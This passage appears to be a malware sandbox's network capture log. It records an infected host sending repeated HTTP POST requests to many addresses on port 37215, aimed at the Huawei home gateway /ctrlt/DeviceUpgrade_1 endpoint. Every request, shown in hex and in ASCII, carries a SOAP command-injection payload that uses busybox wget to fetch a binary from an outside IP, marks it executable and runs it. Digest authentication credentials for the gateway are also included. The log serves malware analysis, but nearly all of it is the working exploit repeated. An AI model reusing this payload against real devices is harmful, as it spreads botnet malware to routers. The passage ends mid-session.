78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1720192.168.2.1552118197.59.76.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462585926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1721192.168.2.1549182197.27.23.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462632895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1722192.168.2.1533750197.21.75.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462649107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1723192.168.2.1534060197.251.169.11237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462651014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1724192.168.2.1547190197.6.14.21337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462651014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1725192.168.2.1537834197.139.78.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462667942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1726192.168.2.1544744197.84.167.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462670088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1727192.168.2.1547246197.55.155.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462702990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1728192.168.2.1559808197.154.95.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462740898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1729192.168.2.1554132197.240.34.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462781906 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1730192.168.2.1540498197.243.34.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462798119 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
